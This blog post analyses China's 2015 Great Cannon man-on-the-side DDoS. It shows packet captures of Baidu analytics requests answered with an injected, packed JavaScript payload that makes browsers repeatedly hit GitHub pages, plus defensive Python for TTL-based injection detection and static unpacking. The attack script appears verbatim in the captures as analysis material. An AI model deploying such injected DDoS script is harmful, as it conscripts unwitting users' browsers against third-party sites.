Great Cannon of China Man-on-the-side DDoS Attack – Actual Traffic and Analysis

December 23, 2017. Filed under: Computer

China can direct a DDoS at any website in the world with its Great Cannon. In the attack described here it turned ordinary visitors to sites that embed code from China's largest search engine, Baidu, into the attackers, and took down multiple websites at the same time without a botnet and without putting malware on a single machine. Could this be what the next war looks like? A cyber war?

By now everyone has heard of China's Great Cannon DDoS attack on GitHub and other targets, but how did they do it? In the traffic below you will see requests to a legitimate website hosted in China. Because we did not want to take part in attacking the New York Times or GitHub, our example requests Baidu's own JavaScript tracking code (a.js from eclick.baidu.com and o.js from cbjs.baidu.com). This is the same idea as Google Analytics: websites embed the snippet to track visitors' activity, actions, referring pages and so on. Every so often, however, a request for that script is answered with a packed script instead, and the word list of that script contains this:

"send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeou"

This is state-sponsored hostile activity at its worst: legitimate users landing on a Chinese website that embeds Baidu's tracking code (Baidu is by far the largest search engine in China) receive this JavaScript instead of the analytics script, and it tells their browser to open connections to the targets. Researchers at Sweden-based Netresec analyzed the technical fingerprints of the malicious JavaScript and found that they differ from the rest of the non-malicious traffic received by the one percent of computers conscripted into the DDoS army. For instance, the IP time-to-live (TTL) values of the packets carrying the malicious content varied widely, from 30 to 229, while the packets carrying the legitimate analytics code consistently arrived with a TTL of 42. The Netresec researchers also tried blocking one of the malicious packets so that the client would ask the originating server to retransmit it; those retransmission requests were ignored. Both observations are consistent with the DDoS code being inserted by a device other than the servers of the websites using Baidu's analytics service.

Netresec could clearly identify that a man-on-the-side injection was taking place by looking at the TTL field of the packets. TTL, or time-to-live, is a field in the header of every IPv4 packet that limits how many hops the packet may travel; despite the name it counts hops, not seconds. Each time a router forwards a packet it subtracts one from the field, and when the value reaches zero the router discards the packet (and normally reports this to the sender with an ICMP time-exceeded message, which is what the last capture below shows). This prevents routing loops from forwarding packets around in a circle forever.

Many systems send packets with a starting TTL of 64 (Linux, macOS and the BSDs; Windows starts at 128, and many routers and some Unix systems at 255). So when a packet arrives with a TTL of 46 from a host known to start at 64, there are 18 hops between you and the sender (64 - 46 = 18). The absolute number matters less than its consistency: packets that really come from one host over one path arrive with the same TTL every time. An injector sitting at another point on the path can copy the server's IP address and ports, but its packets leave from a different hop count, so their TTL does not match, and it cannot stop the real server's reply from arriving a moment later for the same sequence numbers. That second reply is the giveaway of a man-on-the-side, as opposed to a true man-in-the-middle, which could suppress it.
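As an added example (not code from the original post or from Netresec), the following Python applies both fingerprints to raw IPv4/TCP packets: a TTL that jumps between packets claiming the same source, and two segments that occupy the same sequence range with different contents, which is what a reply racing the real server leaves behind in a capture. The packets are constructed inline from values on this page (the addresses and ports of the first capture below, an injected reply with TTL 229 and a genuine one with TTL 42, both starting at sequence number 1); the injected header is byte-for-byte the 107-byte Apache header from the capture, the genuine one is an abbreviated version of the nginx reply. Function names and the ttl_slack threshold are my own.

```python
"""Two fingerprints of man-on-the-side injection, checked on raw IPv4/TCP
packets: (1) packets claiming one source address but arriving with very
different TTLs, and (2) two segments that cover the same TCP sequence range
with different bytes, which is what an injected reply racing the real
server's reply leaves in a capture. Added example, not Netresec's tooling."""
import socket
import struct
from collections import defaultdict

IP_FMT = "!BBHHHBBH4s4s"   # IPv4 header without options (20 bytes)
TCP_FMT = "!HHIIBBHHH"     # TCP header without options (20 bytes)


def build_packet(src, dst, sport, dport, seq, ttl, payload, flags=0x18, ack=1):
    """Constructed test input: a minimal IPv4/TCP packet. Checksums stay zero;
    nothing built here goes on the wire."""
    tcp = struct.pack(TCP_FMT, sport, dport, seq, ack, 5 << 4, flags, 8192, 0, 0) + payload
    ip = struct.pack(IP_FMT, 0x45, 0, 20 + len(tcp), 0, 0x4000, ttl, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return ip + tcp


def parse_packet(raw):
    """Fields the detector needs; None for anything that is not IPv4/TCP."""
    ver_ihl, _, _, _, _, ttl, proto, _, src, dst = struct.unpack(IP_FMT, raw[:20])
    if ver_ihl >> 4 != 4 or proto != 6:
        return None
    seg = raw[(ver_ihl & 0x0F) * 4:]
    sport, dport, seq, _, off, _, _, _, _ = struct.unpack(TCP_FMT, seg[:20])
    return {"src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst), "ttl": ttl,
            "sport": sport, "dport": dport, "seq": seq, "payload": seg[(off >> 4) * 4:]}


def find_injection(raw_packets, ttl_slack=2):
    """Return one finding per anomaly. ttl_slack absorbs small route changes;
    an injector at a different hop count lands far outside it."""
    flows = defaultdict(list)
    for raw in raw_packets:
        pkt = parse_packet(raw)
        if pkt is not None:
            flows[(pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"])].append(pkt)

    findings = []
    for flow, segs in flows.items():
        # (1) one host on one path yields one TTL; a spread means two senders
        ttls = sorted({s["ttl"] for s in segs})
        if ttls[-1] - ttls[0] > ttl_slack:
            findings.append({"kind": "ttl-mismatch", "flow": flow, "ttls": ttls})
        # (2) two data segments for the same sequence range with different bytes
        data = [s for s in segs if s["payload"]]
        for i, a in enumerate(data):
            for b in data[i + 1:]:
                lo = max(a["seq"], b["seq"])
                hi = min(a["seq"] + len(a["payload"]), b["seq"] + len(b["payload"]))
                if lo < hi and (a["payload"][lo - a["seq"]:hi - a["seq"]]
                                != b["payload"][lo - b["seq"]:hi - b["seq"]]):
                    findings.append({"kind": "overlap", "flow": flow,
                                     "seq_range": (lo, hi), "ttls": (a["ttl"], b["ttl"])})
    return findings


# Constructed sample modelled on the first capture below: the injected reply
# (107-byte Apache header, the same length as in the capture) arrives first
# with TTL 229, the genuine server's reply for the same sequence range follows
# with TTL 42. The nginx header is abbreviated.
SERVER, CLIENT = "123.125.115.164", "192.150.187.17"
INJECTED = (b"HTTP/1.1 200 OK\r\nServer: Apache\r\nConnection: close\r\n"
            b"Content-Type: text/javascript\r\nContent-Length: 1130\r\n\r\n")
GENUINE = (b"HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: application/x-javascript\r\n"
           b"Content-Length: 0\r\nConnection: keep-alive\r\n\r\n")
SAMPLE = [
    build_packet(SERVER, CLIENT, 80, 31161, seq=1, ttl=229, payload=INJECTED),
    build_packet(SERVER, CLIENT, 80, 31161, seq=1, ttl=42, payload=GENUINE),
    build_packet(CLIENT, SERVER, 31161, 80, seq=119, ttl=64, payload=b"", flags=0x10),
]

if __name__ == "__main__":
    for finding in find_injection(SAMPLE):
        print(finding)
```

On a real capture you would feed it each packet's bytes after the link-layer header instead of the constructed list. The TTL check alone is the cheaper one and was what Netresec relied on; the overlap check additionally catches an injector that happens to sit at a hop count which makes its TTL look plausible, because it cannot stop the real server from answering too.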

Here is our PCAP traffic sample, converted to text, of what was happening. Note the two different answers to the same GET /a.js request to eclick.baidu.com: the first claims Server: Apache and carries the 1130-byte packed attack script, the second claims Server: nginx and returns the real, empty analytics file (Content-Length: 0).

2015-04-03 11:41:16.361127 IP 192.150.187.17.31161 > 123.125.115.164.80: P 1:119(118) ack 1 win 8192
    GET /a.js HTTP/1.1
    User-Agent: Wget/1.15 (linux-gnu)
    Accept: */*
    Host: eclick.baidu.com
    Connection: Keep-Alive

2015-04-03 11:41:16.722461 IP 123.125.115.164.80 > 192.150.187.17.31161: P 1:108(107) ack 119 win 767
    HTTP/1.1 200 OK
    Server: Apache
    Connection: close
    Content-Type: text/javascript
    Content-Length: 1130

2015-04-03 11:41:16.722866 IP 123.125.115.164.80 > 192.150.187.17.31161: P 108:1132(1024) ack 1 win 768
    eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");!J.K&&l.k("<5 p=\'r://L.8.9/8-T.t\'>\\h/5>");j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=["m://n.9/E","m://n.9/F-G"];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);',62,64,'|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeou

2015-04-03 11:41:16.722884 IP 123.125.115.164.80 > 192.150.187.17.31161: FP 1132:1238(106) ack 1 win 769
    t|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours'.split('|'),0,{}))
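The 1024-byte segment above carries the whole attack script wrapped in the common eval(function(p,a,c,k,e,r){...}) packer: the first argument is the program with every identifier replaced by a short base-62 token, the second and third are the radix (62) and the word count (64), and the fourth is the word list those tokens index (the fragment quoted earlier is the tail of that list). The packer's bootstrap rebuilds the source and hands it to eval. As an added example, not code from the original post or from the attackers, the following Python performs the same substitution offline, so the payload can be read without ever executing it. The packed program and word list are copied from the capture on this page, with 'timeou' and 't' rejoined across the two TCP segments; the helper names are my own.

```python
"""Static unpacker for the eval(function(p,a,c,k,e,r){...}) obfuscation seen in
the injected response. It performs the packer's own base-62 token -> word
substitution in Python, so the payload is recovered without being executed.
Added example; the packed text and word list are copied from the capture."""
import re

RADIX, COUNT = 62, 64   # the packer's 2nd and 3rd arguments in the capture

# 1st argument of the packer, copied from the capture. Raw strings keep the
# backslash of \h, which becomes \x3c after substitution.
PACKED = (
    r"""l.k("<5 p='r://H.B.9/8/2.0.0/8.C.t'>\h/5>");!J.K&&l.k("<5 p='r://L.8.9/8-T.t'>\h/5>");"""
    r"""j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}"""
    r"""d=["m://n.9/E","m://n.9/F-G"];o=d.I;3 e(){7 a=i()%o;q(d[a])}"""
    r"""3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();"""
    r"""b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);"""
)
# 4th argument: the word list, split on '|'. Empty entries are tokens that are
# left as they are. 'timeou' + 't' is rejoined across the two TCP segments.
WORDS = (
    "|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|"
    "responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|"
    "src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|"
    "getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|"
    "code|ajax|url|dataType|timeout|1E4|cache|beforeSend|latest|complete|return|"
    "Math|floor|3E5|UTC|getFullYear|getHours"
).split("|")
assert len(WORDS) == COUNT


def encode(n, radix=RADIX):
    """Mirror of the packer's e(): digits 0-9, a-z, A-Z, most significant first."""
    head = encode(n // radix, radix) if n >= radix else ""
    digit = n % radix
    return head + (chr(digit + 29) if digit > 35 else "0123456789abcdefghijklmnopqrstuvwxyz"[digit])


def unpack(packed, words, radix=RADIX):
    """Replace every whole-word token by its dictionary entry in one pass. The
    packer's loop does this one token at a time; since both match on word
    boundaries and no dictionary word is itself a token, the result is the same."""
    table = {encode(i, radix): w for i, w in enumerate(words) if w}
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), packed)


def extract_targets(script):
    """Return the URLs listed in url_array=[...] of the decoded script."""
    m = re.search(r"url_array=\[(.*?)\]", script)
    return re.findall(r'"([^"]+)"', m.group(1)) if m else []


if __name__ == "__main__":
    source = unpack(PACKED, WORDS)
    print(source)
    print("targets:", extract_targets(source))
```

The decoded script loads jQuery from libs.baidu.com (falling back to code.jquery.com), defines url_array=["https://github.com/greatfire","https://github.com/cn-nytimes"], picks one of the two by unixtime()%NUM, fetches it with $.ajax as a script with a 10-second timeout, and in the completion handler reschedules itself with setTimeout for as long as fewer than 3E5 milliseconds, five minutes, have passed since the page loaded. Every browser that received this response therefore hammered GitHub for five minutes, which is why Netresec's TTL check mattered: the Baidu servers never sent any of it.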

2015-04-03 11:41:17.386631 IP 192.150.187.17.31161 > 123.125.115.164.80: P 1:119(118) ack 1 win 8192
    GET /a.js HTTP/1.1
    User-Agent: Wget/1.15 (linux-gnu)
    Accept: */*
    Host: eclick.baidu.com
    Connection: Keep-Alive

2015-04-03 11:41:17.774049 IP 123.125.115.164.80 > 192.150.187.17.31161: . ack 119 win 14600
2015-04-03 11:41:17.774467 IP 123.125.115.164.80 > 192.150.187.17.31161: P 1:312(311) ack 119 win 14600
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 03 Apr 2015 15:41:17 GMT
    Content-Type: application/x-javascript
    Content-Length: 0
    Last-Modified: Fri, 03 Apr 2015 08:55:28 GMT
    Connection: keep-alive
    ETag: "551e5580-0"
    Expires: Fri, 03 Apr 2015 16:41:17 GMT
    Cache-Control: max-age=3600
    Accept-Ranges: bytes

2015-04-03 16:56:49.500107 IP 192.150.187.17.20000 > 123.125.65.120.80: S 3993609:3993609(0) win 8192
2015-04-03 16:56:49.513486 IP 192.150.187.17.20000 > 123.125.65.120.80: . ack 10033422 win 8192
2015-04-03 16:56:49.521300 IP 192.150.187.17.20000 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192
    GET /js/o.js HTTP/1.1
    Host: cbjs.baidu.com
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://www.guokr.com/article/437015/
    Connection: keep-alive

2015-04-03 16:56:49.529089 IP 192.150.187.17.20000 > 123.125.65.120.80: S 3993896:3993896(0) win 8192
2015-04-03 16:56:49.537135 IP 192.150.187.17.20000 > 123.125.65.120.80: . ack 1 win 8192
2015-04-03 16:56:49.545312 IP 192.150.187.17.20000 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192
    GET /?falun HTTP/1.1
    User-Agent: Wget/1.15 (linux-gnu)
    Accept: */*
    Host: www.google.com
    Connection: Keep-Alive

2015-04-03 16:56:49.553116 IP 192.150.187.17.20001 > 123.125.65.120.80: S 17314055:17314055(0) win 8192
2015-04-03 16:56:49.561119 IP 192.150.187.17.20001 > 123.125.65.120.80: . ack 21433245 win 8192
2015-04-03 16:56:49.569559 IP 192.150.187.17.20001 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192
    GET /js/o.js HTTP/1.1
    Host: cbjs.baidu.com
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://www.guokr.com/article/437015/
    Connection: keep-alive

2015-04-03 16:56:49.577146 IP 192.150.187.17.20001 > 123.125.65.120.80: S 17314342:17314342(0) win 8192
2015-04-03 16:56:49.585074 IP 192.150.187.17.20001 > 123.125.65.120.80: . ack 1 win 8192
2015-04-03 16:56:49.593233 IP 192.150.187.17.20001 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192
    GET /?falun HTTP/1.1
    User-Agent: Wget/1.15 (linux-gnu)
    Accept: */*
    Host: www.google.com
    Connection: Keep-Alive

2015-04-03 16:56:49.702218 IP 192.150.187.17.20004 > 123.125.65.120.80: S 615002:615002(0) win 8192
2015-04-03 16:56:49.709823 IP 192.150.187.17.20004 > 123.125.65.120.80: . ack 29776619 win 8192
2015-04-03 16:56:49.718088 IP 192.150.187.17.20004 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192
    GET /js/o.js HTTP/1.1
    Host: cbjs.baidu.com
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://www.guokr.com/article/437015/
    Connection: keep-alive

2015-04-03 16:56:49.725818 IP 192.150.187.17.20004 > 123.125.65.120.80: S 615289:615289(0) win 8192
2015-04-03 16:56:49.737804 IP 192.150.187.17.20004 > 123.125.65.120.80: . ack 1 win 8192
2015-04-03 16:56:49.746030 IP 192.150.187.17.20004 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192
    GET /?falun HTTP/1.1
    User-Agent: Wget/1.15 (linux-gnu)
    Accept: */*
    Host: www.google.com
    Connection: Keep-Alive

2015-04-03 16:56:49.753793 IP 192.150.187.17.20005 > 123.125.65.120.80: S 23124395:23124395(0) win 8192
2015-04-03 16:56:49.761856 IP 192.150.187.17.20005 > 123.125.65.120.80: . ack 31158638 win 8192
2015-04-03 16:56:49.770528 IP 192.150.187.17.20005 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192
    GET /js/o.js HTTP/1.1
    Host: cbjs.baidu.com
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://www.guokr.com/article/437015/
    Connection: keep-alive

2015-04-03 16:56:49.777836 IP 192.150.187.17.20005 > 123.125.65.120.80: S 23124682:23124682(0) win 8192
2015-04-03 16:56:49.785806 IP 192.150.187.17.20005 > 123.125.65.120.80: . ack 1 win 8192
2015-04-03 16:56:49.794034 IP 192.150.187.17.20005 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192
    GET /?falun HTTP/1.1
    User-Agent: Wget/1.15 (linux-gnu)
    Accept: */*
    Host: www.google.com
    Connection: Keep-Alive

2015-04-03 16:56:52.394059 IP 192.150.187.17.20058 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192
    GET /js/o.js HTTP/1.1
    Host: cbjs.baidu.com
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://www.guokr.com/article/437015/
    Connection: keep-alive

2015-04-03 16:56:52.400648 IP 123.125.65.120.80 > 192.150.187.17.20054: S 1636608291:1636608291(0) ack 2549121 win 2937
2015-04-03 16:56:52.401820 IP 192.150.187.17.20058 > 123.125.65.120.80: S 16946615:16946615(0) win 8192
2015-04-03 16:56:52.409800 IP 192.150.187.17.20058 > 123.125.65.120.80: . ack 1 win 8192
2015-04-03 16:56:52.411115 IP 123.125.65.120.80 > 192.150.187.17.20054: R 2668727381:2668727381(0) ack 1 win 2941
2015-04-03 16:56:52.418085 IP 192.150.187.17.20058 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192
    GET /?falun HTTP/1.1
    User-Agent: Wget/1.15 (linux-gnu)
    Accept: */*
    Host: www.google.com
    Connection: Keep-Alive

2015-04-03 16:57:03.022068 IP 192.150.187.17.20274 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192
    GET /js/o.js HTTP/1.1
    Host: cbjs.baidu.com
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://www.guokr.com/article/437015/
    Connection: keep-alive

2015-04-03 16:57:03.024429 IP 123.125.65.120.80 > 192.150.187.17.20270: S 2758833337:2758833337(0) ack 5647123 win 486
2015-04-03 16:57:03.029860 IP 192.150.187.17.20274 > 123.125.65.120.80: S 5112257:5112257(0) win 8192
2015-04-03 16:57:03.030160 IP 123.125.65.120.80 > 192.150.187.17.20270: R 1555041284:1555041284(0) ack 1 win 490
2015-04-03 16:57:03.037899 IP 192.150.187.17.20274 > 123.125.65.120.80: . ack 1 win 8192
2015-04-03 16:57:03.038698 IP 123.125.65.120.80 > 192.150.187.17.20270: P 1555041284:1555041391(107) ack 287 win 820
    HTTP/1.1 200 OK
    Server: Apache
    Connection: close
    Content-Type: text/javascript
    Content-Length: 1130

2015-04-03 16:57:03.039348 IP 123.125.65.120.80 > 192.150.187.17.20270: P 1555041391:1555042415(1024) ack 1 win 821
    [1024 bytes: the same eval(function(p,a,c,k,e,r){...}) packed script as in the first sample, ending at ...|url|dataType|timeou]

2015-04-03 16:57:03.039388 IP 123.125.65.120.80 > 192.150.187.17.20270: FP 1555042415:1555042521(106) ack 1 win 822
    t|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours'.split('|'),0,{}))

2015-04-03 16:57:03.039395 IP 123.125.65.120.80 > 192.150.187.17.20270: R 1555041391:1555041391(0) ack 287 win 489
2015-04-03 16:57:03.039399 IP 123.125.65.120.80 > 192.150.187.17.20270: R 1555042521:1555042521(0) ack 1 win 491
2015-04-03 16:57:03.039402 IP 123.125.65.120.80 > 192.150.187.17.20270: R 1555042415:1555042415(0) ack 1 win 493
2015-04-03 16:57:03.045725 IP 123.125.65.120.80 > 192.150.187.17.20270: S 1237632748:1237632748(0) ack 5647410 win 495
2015-04-03 16:57:03.047090 IP 192.150.187.17.20274 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192
    GET /?falun HTTP/1.1
    User-Agent: Wget/1.15 (linux-gnu)
    Accept: */*
    Host: www.google.com
    Connection: Keep-Alive

2015-04-03 16:57:06.966079 IP 192.150.187.17.20354 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192
    GET /js/o.js HTTP/1.1
    Host: cbjs.baidu.com
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://www.guokr.com/article/437015/
    Connection: keep-alive

2015-04-03 16:57:06.973800 IP 192.150.187.17.20354 > 123.125.65.120.80: S 830702:830702(0) win 8192
2015-04-03 16:57:06.974083 IP 123.125.65.120.80 > 192.150.187.17.20350: R 1119351077:1119351077(0) ack 1 win 1381
2015-04-03 16:57:06.982296 IP 192.150.187.17.20354 > 123.125.65.120.80: . ack 1 win 8192
2015-04-03 16:57:06.984590 IP 123.125.65.120.80 > 192.150.187.17.20350: P 1119351077:1119351184(107) ack 287 win 823
    HTTP/1.1 200 OK
    Server: Apache
    Connection: close
    Content-Type: text/javascript
    Content-Length: 1130

2015-04-03 16:57:06.984925 IP 123.125.65.120.80 > 192.150.187.17.20350: P 1119351184:1119352208(1024) ack 1 win 824
    [1024 bytes: the same eval(function(p,a,c,k,e,r){...}) packed script as in the first sample, ending at ...|url|dataType|timeou]

2015-04-03 16:57:06.984954 IP 123.125.65.120.80 > 192.150.187.17.20350: FP 1119352208:1119352314(106) ack 1 win 825
    t|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours'.split('|'),0,{}))

2015-04-03 16:57:06.985905 IP 123.125.65.120.80 > 192.150.187.17.20350: R 1119351184:1119351184(0) ack 287 win 1384
2015-04-03 16:57:06.985926 IP 123.125.65.120.80 > 192.150.187.17.20350: R 1119352208:1119352208(0) ack 1 win 1386
2015-04-03 16:57:06.985930 IP 123.125.65.120.80 > 192.150.187.17.20350: R 1119352314:1119352314(0) ack 1 win 1388
2015-04-03 16:57:06.990088 IP 192.150.187.17.20354 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192
    GET /?falun HTTP/1.1
    User-Agent: Wget/1.15 (linux-gnu)
    Accept: */*
    Host: www.google.com
    Connection: Keep-Alive

2015-04-03 16:17:08.842143 IP 192.150.187.32.11010 > 123.125.65.120.80: P 26809681:26809967(286) ack 5633851 win 8192
    GET /js/o.js HTTP/1.1
    Host: cbjs.baidu.com
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://www.guokr.com/article/437015/
    Connection: keep-alive

2015-04-03 16:17:08.846541 IP 123.125.65.120.80 > 192.150.187.32.11003: P 1:108(107) ack 286 win 2476
    HTTP/1.1 200 OK
    Server: Apache
    Connection: close
    Content-Type: text/javascript
    Content-Length: 1130

2015-04-03 16:17:08.846955 IP 123.125.65.120.80 > 192.150.187.32.11003: P 108:1132(1024) ack 0 win 2477
    [1024 bytes: the same eval(function(p,a,c,k,e,r){...}) packed script as in the first sample, ending at ...|url|dataType|timeou]

2015-04-03 16:17:08.846997 IP 123.125.65.120.80 > 192.150.187.32.11003: FP 1132:1238(106) ack 0 win 2478
    t|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours'.split('|'),0,{}))

2015-04-03 16:17:08.850152 IP 192.150.187.14.11010 > 123.125.65.120.80: P 12182551:12182837(286) ack 27010254 win 8192
    GET /js/o.js HTTP/1.1
    Host: cbjs.baidu.com
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://www.guokr.com/article/437015/
    Connection: keep-alive

2015-04-03 12:58:37.676811 IP 123.125.65.120.80 > 192.150.187.17.19487: P 1:108(107) ack 286 win 704
    HTTP/1.1 200 OK
    Server: Apache
    Connection: close
    Content-Type: text/javascript
    Content-Length: 1130

2015-04-03 12:58:37.677098 IP 123.125.65.120.80 > 192.150.187.17.19487: P 108:1132(1024) ack 0 win 705
    [1024 bytes: the same eval(function(p,a,c,k,e,r){...}) packed script as in the first sample, ending at ...|url|dataType|timeou]

2015-04-03 12:58:37.677131 IP 123.125.65.120.80 > 192.150.187.17.19487: FP 1132:1238(106) ack 0 win 706
    t|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours'.split('|'),0,{}))

ICMP time-exceeded replies from 124.65.194.54, an intermediate hop; each one quotes the first bytes of the GET /js/o.js request whose TTL ran out there:

2015-04-03 12:58:37.690143 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76
    GET /js/o.js HTTP/1.1
    Host:
2015-04-03 12:58:37.698336 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76
    GET /js/o.js HTTP/1.1
    Host:
2015-04-03 12:58:37.706121 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76
    GET /js/o.js HTTP/1.1
    Host:
2015-04-03 12:58:37.714311 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76
    GET /js/o.js HTTP/1.1
    Host:
2015-04-03 12:58:37.746264 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76
    GET /js/o.js HTTP/1.1
    Host:
2015-04-03 12:58:37.758229 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76
    GET /js/o.js HTTP/1.1
    Host:
2015-04-03 12:58:37.766636 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76
    GET /js/o.js HTTP/1.1
    Host:
2015-04-03 12:58:37.774319 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76
    GET /js/o.js HTTP/1.1
    Host:
2015-04-03 12:58:37.782302 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76
    GET /js/o.js HTTP/1.1
    Host:
